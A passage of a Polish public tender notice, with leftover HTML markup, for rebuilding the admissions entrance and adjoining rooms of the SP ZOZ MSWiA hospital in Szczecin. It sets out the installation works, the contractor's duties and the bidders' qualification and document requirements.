odpowiednimi służbami Zamawiającego oraz zgodnie z następującym zestawieniem:Nr pom.	Ilość gniazd telefonicznych	Ilość gniazd LAN0/01	2	20/02	1	20/04	1	10/05	1	10/08	1	10/10A	2	20/10B	2	20/11A	1	123)	wykonanie zasilania maceratora w pom. 0/05.UWAGA: po wykonaniu instalacji elektrycznych, należy wykonać pomiary elektryczne.4. Projektowany zakres robót w branży sanitarnej:1) instalacja wodociągowa:- wykonanie instalacji wodociągowej z rur PP-3 PN20 stabilizowanych wkładką aluminiową, zgrzewanych wraz z izolacją z pianki PE prowadzonymi pod stropem pomieszczeń,- na odgałęzieniach zasilających poszczególne poziomy wodociągowe należy zamontować zawory odcinające kulowe PN20*,- piony prowadzić w bruzdach,- wykonanie próby szczelności, dezynfekcji, - wykonanie badania wody przez jednostkę SANEPID – po stronie Wykonawcy,- umywalki z półpostumentem z otworem na baterie stojącą,- zlewozmywak dwukomorowy na szafce (pom. 0/08)*,- zlew gospodarczy (pom. 0/11B),- baterie umywalkowe bezdotykowe sterowane elektrycznie, czasowe,- natrysk z odpływem w posadzce, wyposażony w baterię z wężem o długości 2,0 m oraz drążek natryskowy – pom. 0/05,- umywalka ze stali nierdzewnej wisząca z osłoniętym syfonem - pom. 0/05,- miska ustępowa wisząca ze stali nierdzewnej z samozamykającym się zaworem spłukującym - pom. 0/05,- macerator – po stronie Wykonawcy tylko wykonanie zasilania elektrycznego, przyłącza wody ¾” i kanalizacyjnego o średnicy 50 mm – pom. 0/05.2) instalacja kanalizacyjna:- demontaż istniejących urządzeń wraz z instalacją wod. – kan. (umywalki, kabiny, wpusty podłogowe),- zaprojektowano grawitacyjne odprowadzenie ścieków bytowych przez włączenie nowej instalacji wewnętrznej kanalizacji ułożonej pod posadzką i stropem do wewnętrznej istniejącej instalacji kanalizacji sanitarnej (przed rozpoczęciem robót sprawdzić rzędną dna kanałów istniejących i zweryfikować z projektem pod względem projektowanego zagłębienia nowych kanałów),- instalację kanalizacyjną grawitacyjną wykonać z rur i kształtek PVC szarych układanych na ścianach i pod stropem, łączonych za pomocą uszczelki gumowej,- podejście do przyborów wykonać w bruzdach ściennych,- odpływ od każdego przyboru należy zaopatrzyć w syfon,- montaż zlewu gospodarczego w pom. 0/11B,- montaż zlewu dwukomorowego na szafce w pom. 0/08*,- natrysk z odpływem w posadzce wyposażony w baterię z wężem o długości 2,0 m oraz drążek natryskowy – pom. 0/05,- umywalka ze stali nierdzewnej wisząca z osłoniętym syfonem – pom. 0/05,- miska ustępowa wisząca ze stali nierdzewnej z samozamykającym się zaworem spłukującym – pom. 0/05,- macerator – po stronie Wykonawcy tylko wykonanie zasilania elektrycznego, przyłącza wody ¾” i kanalizacyjnego o średnicy 50 mm – pom. 0/05.3) instalacja wentylacji mechanicznej – według odrębnego postępowania,4) instalacja c.o.*:- korekta instalacji, wykonanie podłączeń z rur miedzianych, montaż grzejników higienicznych w pom. 0/03, 0/04, 0/05, 0/10A i 0/10B,- montaż zaworów odcinających,- montaż zaworów i głowic termostatycznych.5. Zakres robót nie obejmuje:1) dostawy dozowników mydła, środków dezynfekujących, ręczników, 2) dostawy wieszaków, luster,3) dostawy wyposażenia ruchomego, mebli,4) wykonania zadaszenia zewnętrznego (wiaty),5) wykonania izolacji fundamentów, 6) wykonania instalacji gazów medycznych,7) wykonania konstrukcji ramy R1 pod centralę wentylacyjną,8) wykonania wentylacji mechanicznej, nawiewno – wywiewnej, która objęta jest osobnym postępowaniem,9) robót zaplanowanych do wykonania w kolejnych etapach, tj. modernizacji pomieszczeń o numerach od 0/12 do 0/19C oraz wykonania toalety dla niepełnosprawnych - zgodnie z rys. PW/A/04A – Projekt wykonawczy – Architektura,10) robót zaplanowanych do wykonania w pomieszczeniach znajdujących się w projektowanej części socjalnej dla pracowników SP ZOZ MSWiA w Szczecinie – pom. nr 0/20 do nr 0/33 – zgodnie z rys. PW/A/02 – Projekt wykonawczy – Architektura. UWAGA: wszystkie przepusty instalacyjne w elementach oddzielenia przeciwpożarowego powinny mieć klasę odporności ogniowej (EI) wymaganą dla tych elementów – zgodnie z obowiązującymi przepisami.6. Podstawa wykonania zamówienia:1) projekt budowlany i wykonawczy pn. „Przebudowa wejścia do Izby Przyjęć wraz z pomieszczeniami towarzyszącymi dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej Ministerstwa Spraw Wewnętrznych i Administracji przy ul. Jagiellońskiej 44 w Szczecinie” wykonany przez ATΞLIΞR PRACOWNIA ARCHITEKTONICZNA KRZYSZTOF KALERT - zakres zgodnie z rozdziałem II SIWZ działem 3.,2) decyzja o pozwoleniu na budowę,3) opis przedmiotu zamówienia - rozdział II SIWZ,4) przedmiary robót,5) wizja lokalna.UWAGA: opis przedmiotu zamówienia zawiera dodatkowe informacje uzupełniające / wyjaśniające opis zawarty w projektach branżowych (oznaczone*), zapisy te są wiążące dla Wykonawcy. 5. Informacje ogólne5.1. Wykonawca przedstawi Zamawiającemu do akceptacji wniosek materiałowy na każdy element wykończeniowy (widoczny) dla przedmiotowego przedsięwzięcia (wniosek powinien zawierać: certyfikaty na znak bezpieczeństwa, deklaracje zgodności wyrobów z polską lub europejską normą, aprobaty techniczne oraz gwarancje producentów dla montowanych urządzeń i sprzętu). Przekazywane materiały powinny być skatalogowane, opisane, uporządkowane i zgrupowane według branż. Zamawiający zastrzega sobie 3 dni robocze na akceptację, bądź odrzucenie wniosku.5.2. Wykonawca winien wykonać wszelkie prace zabezpieczające i pomocnicze, a w szczególności:1) przetransportować niezbędne materiały, właściwie je zabezpieczyć i składować,2) wykonać niezbędne prace zabezpieczające, mające na celu niedopuszczenie do uszkodzeń mienia i pomieszczeń SP ZOZ MSWiA w Szczecinie,3) zaopatrzyć kadrę we wszelkie niezbędne środki ochrony osobistej wraz ze szkoleniami i innymi elementami niezbędnymi do wykonania przedmiotu zamówienia.5.3. Wykonawca winien przygotować dokumentację powykonawczą wraz z pełną informacją jakościową, tj. charakterystyką użytych materiałów oraz z podaniem sposobu ich konserwacji i użytkowania – dokumentacja powykonawcza powinna być dostarczona najpóźniej na dzień przed odbiorem końcowym. Brak dokumentacji powykonawczej na dzień przed odbiorem, anuluje rozpoczęcie procedury odbioru. 5.4. Wykonawca jest zobowiązany do organizowania robót w sposób niekolidujący ze zwykłą działalnością przedsiębiorstwa, jakim jest SP ZOZ MSWiA w Szczecinie. Z uwagi na konieczność utrzymania ciągłej pracy Izby Przyjęć przez cały czas prowadzenia robót, ich kolejność i zakres musi być ustalona z Zamawiającym przed ich rozpoczęciem. Wszelkie zmiany mogą być wprowadzane tylko po dokonaniu szczegółowych uzgodnień z Zamawiającym.5.5. Zamawiający informuje o braku możliwości składowania materiałów i sprzętu w rejonie działań Wykonawcy.5.6.	Zamawiający informuje, że na terenie SP ZOZ MSWiA w Szczecinie obowiązuje całkowity zakaz palenia.5.7.	Prace mogą być prowadzone 24 godziny na dobę, za wyjątkiem prac głośnych i uciążliwych, które należy zakończyć do godziny 22:00.6. Obowiązki Wykonawcy: 1) protokolarne przejęcie od Zamawiającego terenu budowy,2) organizacja zaplecza budowy w miejscu uzgodnionym z Zamawiającym (zaplecze techniczne i socjalno – higieniczne dla pracowników),3) współpraca i dostosowanie organizacji pracy przy wykonywaniu robót budowlanych, przy wzajemnym poszanowaniu interesów Wykonawcy i Zamawiającego oraz ewentualnego Wykonawcy wybranego w rezultacie innego postępowania o udzielenie zamówienia publicznego rozstrzygniętego przez Zamawiającego i prowadzącego równoległe prace własne w obszarze pomieszczeń Izby Przyjęć SP ZOZ MSWiA w Szczecinie; w ramach tego obowiązku Wykonawca m.in. wykona następujące prace: zabezpieczy na własny koszt i ryzyko, w szczególności przed zniszczeniem, uszkodzeniem, zakurzeniem i zalaniem mienie znajdujące się w miejscach wykonywania robót budowlanych lub w pobliżu tych miejsc,4) Wykonawca zobowiązany jest wykonać i utrzymać na swój koszt ogrodzenie miejsc wykonywania robót budowlanych, strzec mienia znajdującego się w miejscach wykonywania robót budowlanych oraz zapewnić w tych miejscach warunki bezpieczeństwa, w szczególności bezpieczeństwa przeciwpożarowego (ochrony przeciwpożarowej i zabezpieczenia przeciwpożarowego) oraz bezpieczeństwa i higieny pracy,5)	od chwili protokolarnego przekazania Wykonawcy terenu budowy, na którym będą wykonywane roboty budowlane, Wykonawca odpowiada za organizację swojego zaplecza na tym placu, utrzymanie ładu i porządku oraz usuwanie wszelkich odpadów powstałych wskutek wykonywania robót budowlanych (na swój koszt), bez prawa składowania tych odpadów na terenie SP ZOZ MSWiA w Szczecinie, w szczególności w pomieszczeniach w których prowadzone są prace,6)	najpóźniej w dniu rozpoczęcia prac Wykonawca zobowiązany jest do umieszczenia kontenera na odpady budowlane w miejscu wskazanym przez Zamawiającego,7)	opróżnianie kontenera o którym mowa powyżej,8)	wydatki związane z umieszczeniem kontenera na odpady powstałe w związku z wykonywaniem robót budowlanych, w tym wydatki na zakup kontenera, obciążają Wykonawcę,9)	do obowiązków Wykonawcy w czasie wykonywania robót budowlanych należy utrzymywanie terenu budowy, na którym będą wykonywane roboty budowlane, w stanie wolnym od przeszkód komunikacyjnych oraz usunięcie z tych miejsc wszelkich urządzeń pomocniczych i zbędnych materiałów, odpadów i śmieci oraz niepotrzebnych urządzeń, po zakończeniu robót budowlanych w danym dniu,10)	oznaczenie terenu budowy oraz odpowiednie oznakowanie i zabezpieczenie miejsc prowadzonych robót, wygrodzenie stref niebezpiecznych – zgodnie z obowiązującymi przepisami,11)	Wykonawca zobowiązuje się do umożliwienia wstępu do miejsc wykonywania robót budowlanych pracownikom organów państwowych oraz służbom Zamawiającego, celem dokonania inspekcji budowy zgodnie z zakresem zadań określonym aktami prawnymi oraz do udostępniania im danych i informacji określonych prawem,12) po zakończeniu robót budowlanych Wykonawca zobowiązany jest uporządkować i przekazać plac budowy Zamawiającemu w terminie odbioru końcowego robót budowlanych,13) Wykonawca ponosi koszty poboru mediów (woda, energia elektryczna) w wysokości 1 000,00 zł brutto za całe zadanie. Z tego tytułu Zamawiający wystawi Wykonawcy fakturę VAT,14) Wykonawca dostarczy na swój koszt materiały i jednostki sprzętowe, a w szczególności urządzenia, maszyny, aparaty, narzędzia, niezbędne do wykonania robót budowlanych,15) od chwili protokolarnego przekazania Wykonawcy terenu, na którym będą wykonywane roboty budowlane, Wykonawca odpowiada za organizację swojego zaplecza na tym placu, utrzymanie ładu i porządku oraz usuwanie wszelkich odpadów powstałych wskutek wykonywania robót budowlanych (na swój koszt), bez prawa składowania tych odpadów na terenie SP ZOZ MSWiA w Szczecinie. Wykonawca zobowiązany jest do przedłożenia zaświadczenia, wystawionego przez firmę posiadającą zezwolenia i uprawnienia przewidziane przez ustawodawcę w ustawie z dnia 14 grudnia 2012 r. o odpadach (t.j. Dz. U. z 2018 r., poz. 992 z późn. zm.) o przyjęciu na utylizację i składowanie odpadów powstałych w związku z wykonywaniem niniejszej umowy. Wykonawca ponosi również odpowiedzialność, zgodnie z powszechnie obowiązującymi przepisami prawa, za wykonanie pozostałych obowiązków związanych z postępowaniem z odpadami powstałymi podczas wykonywania niniejszej umowy,16) do obowiązków Wykonawcy w czasie wykonywania robót budowlanych należy utrzymywanie terenu budowy, na którym będą wykonywane roboty budowlane, w stanie wolnym od przeszkód komunikacyjnych oraz usunięcie z tych miejsc wszelkich urządzeń pomocniczych i zbędnych materiałów, odpadów i śmieci oraz niepotrzebnych urządzeń, po zakończeniu robót budowlanych,17) Wykonawca na zakończenie robót przedłoży zaświadczenia, wystawione przez firmę posiadającą zezwolenia i uprawnienia przewidziane przez ustawodawcę w ustawie z dnia 14 grudnia 2012 r. o odpadach (t.j. Dz. U. z 2018 r., poz. 992 z późn. zm.) o przyjęciu na utylizację i składowanie odpadów (wywóz gruzu itp.),18) Wykonawca ponosi odpowiedzialność zgodnie z powszechnie obowiązującymi przepisami prawa za postępowanie z odpadami powstałymi podczas wykonywania niniejszej umowy,19) zgłaszanie Zamawiającemu robót ulegających zakryciu i robót zanikających,20) wykonanie na własny koszt odkrywki elementów robót budzących wątpliwość w celu sprawdzenia jakości ich wykonania, jeżeli wykonanie tych robót nie zostało zgłoszone do sprawdzenia przed ich zakryciem,21) gruntowne sprzątanie obiektu po wykonanych pracach przed odbiorem końcowym,22) dostarczenie Zamawiającemu dokumentacji odbiorowej robót, najpóźniej na dzień przed odbiorem końcowym, w tym: dokumentacji powykonawczej, protokołów prób, badań i sprawdzeń,23) zgodnie z art. 29 ust. 3 uPZP, Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, noszących znamiona stosunku pracy w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz. U. z 2016 r. poz. 1666, z późn. zm.). Zatrudnienie, o którym mowa w zdaniu pierwszym, powinno trwać przez cały okres realizacji zamówienia. Wykonawca na każde żądanie Zamawiającego jest zobowiązany wykazać, że osoby zatrudnione przez niego lub przez Podwykonawcę, świadczące pracę w rozumieniu art. 22 § 1 KP, są zatrudnione na podstawie umów o pracę. Wykonawca lub Podwykonawca składają Zamawiającemu dowody zawarcia umów o pracę w terminie 14 dni od daty skierowania żądania pod rygorem zapłaty kary umownej w wysokości odpowiadającej wartości 0,2% wynagrodzenia brutto Wykonawcy za każde naruszenie tego obowiązku, 24) niezależnie od obowiązków wymienionych powyżej Wykonawca przyjmuje także następujące obowiązki:-	w wypadku powstania uszkodzenia lub zniszczenia mienia w toku wykonywania robót budowlanych – naprawienie i doprowadzenie do stanu poprzedniego,-	zatrudnienia osób posiadających aktualne badania lekarskie, aktualne przeszkolenie w zakresie bezpieczeństwa i higieny pracy, bezpieczeństwa przeciwpożarowego (zabezpieczenia przeciwpożarowego i ochrony przeciwpożarowej) odpowiadające rodzajowi wykonywanych prac oraz przeszkolonych stanowiskowo w zakresie bezpieczeństwa i higieny pracy, bezpieczeństwa przeciwpożarowego (zabezpieczenia przeciwpożarowego i ochrony przeciwpożarowej),-	odsunięcie od wykonywania robót budowlanych każdej osoby, która przez swój brak kwalifikacji lub uprawnień oraz z innego powodu zagraża w jakikolwiek sposób należytemu wykonaniu umowy lub naraża Zamawiającego na szkody lub straty,-	ponoszenie pełnej odpowiedzialności za szkody spowodowane przez wszystkie osoby zatrudnione przy wykonywaniu robót budowlanych, powstałe w szczególności na skutek naruszenia przepisów z zakresu bezpieczeństwa i higieny pracy, bezpieczeństwa przeciwpożarowego (zabezpieczenia przeciwpożarowego i ochrony przeciwpożarowej),-	w przypadku wystąpienia uszkodzeń lub zniszczeń podczas odkrywania lub wykonywania otworów – naprawienie i doprowadzenie ich do stanu poprzedniego (na koszt Wykonawcy),-	w przypadku konieczności odłączenia mediów na terenie wykonywania robót, Wykonawca może je odłączyć za uprzednią, pisemną zgodą Zamawiającego (zgłoszenie musi nastąpić min. na 3 dni robocze przed planowanym odłączeniem).</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45215140-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45332000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45400000-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamówienia, o których mowa w art. 67 ust. 1 pkt 6 uPZP:Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 67 ust. 1 pkt 6 uPZP, polegającego na powtórzeniu podobnych robót budowlanych, zgodnych z przedmiotem zamówienia podstawowego 1) przedmiot zamówienia: powtórzenie robót budowlanych podobnych do określonych w zamówieniu podstawowym,2) wielkość lub zakres zamówienia: do 20% wartości zamówienia podstawowego,3) warunki, na jakich zostanie udzielone zamówienie: warunki umowy podstawowej oraz ustalone w wyniku negocjacji. </span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">90</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie dokonuje opisu sposobu spełniania warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie dokonuje opisu sposobu spełniania warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna, że Wykonawca posiada wymagane zdolności techniczne lub zawodowe zapewniające należyte wykonanie zamówienia, jeżeli Wykonawca łącznie wykaże, że:a) wykonał należycie, zgodnie z przepisami Prawa budowlanego oraz zasadami sztuki budowlanej i prawidłowo ukończył, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie podobne roboty budowlane zrealizowane w budynku użyteczności publicznej, w tym min. jedną robotę budowlaną zrealizowaną w obiekcie służby zdrowia, o wartości brutto nie mniejszej niż 180 000,00 złotych – każda z nich. Za jedną podobną robotę budowlaną Zamawiający uzna robotę polegającą na przebudowie lub remoncie i obejmującą swoim zakresem branże: budowlaną, elektryczną, wodno – kanalizacyjną, W przypadku składania oferty wspólnej ww. warunek, Wykonawcy składający ofertę wspólną, mogą spełniać łącznie.b) dysponuje lub będzie dysponował zespołem osób spełniających wymagania dot. kwalifikacji i doświadczenia zawodowego oraz posiadających uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalnościach:- kierownik budowy:Uprawnienia: do wykonywania samodzielnych funkcji technicznych w budownictwie o specjalności konstrukcyjno-budowlanej, bez ograniczeń. Doświadczenie: co najmniej pięcioletnie doświadczenie zawodowe w wykonywaniu samodzielnych funkcji technicznych w budownictwie, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane, w zakresie kierowania robotami budowlanymi jako kierownik budowy (okres pięcioletni doświadczenia rozumiany będzie jako suma okresów, w których osoba faktycznie kierowała robotami wymaganymi do udokumentowania w ramach ww. doświadczenia), w tym pełnienie samodzielnej funkcji technicznej przy przebudowach lub remontach budynków kubaturowych.Należący do Okręgowej Izby Inżynierów Budownictwa.- kierownik robót budowlanych w branży sanitarnej: Uprawnienia: do wykonywania samodzielnych funkcji technicznych w budownictwie o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, bez ograniczeń. - kierownik robót budowlanych w branży elektrycznej:Uprawnienia: do wykonywania samodzielnych funkcji technicznych w budownictwie o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, bez ograniczeń.W przypadku składania oferty wspólnej ww. warunek musi spełniać co najmniej jeden z Wykonawców w całości.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane, do realizacji których te zdolności są wymagane. Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 13-22 i art. 24 ust. 5 pkt 1 uPZP.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 uPZP, 2) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 uPZP (załącznik nr 3 do SIWZ). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia, 3) dokumenty wymieniony w § 5 pkt 1 – 9 rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 r., poz. 1126), dotyczących innego podmiotu na którego zasobach Wykonawca polega, celem potwierdzenia spełnienia warunków udziału w postępowaniu, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami Prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty (załącznik nr 4 do SIWZ),2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 5 do SIWZ).</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1) formularz ofertowy (załącznik nr 1 do SIWZ), 2) pełnomocnictwo do podpisania oferty, o ile nie wynika ono z ustawy albo z innych dokumentów załączonych do oferty, lub dokumentów, o których mowa w art. 26 ust. 6 uPZP, 3) dowód 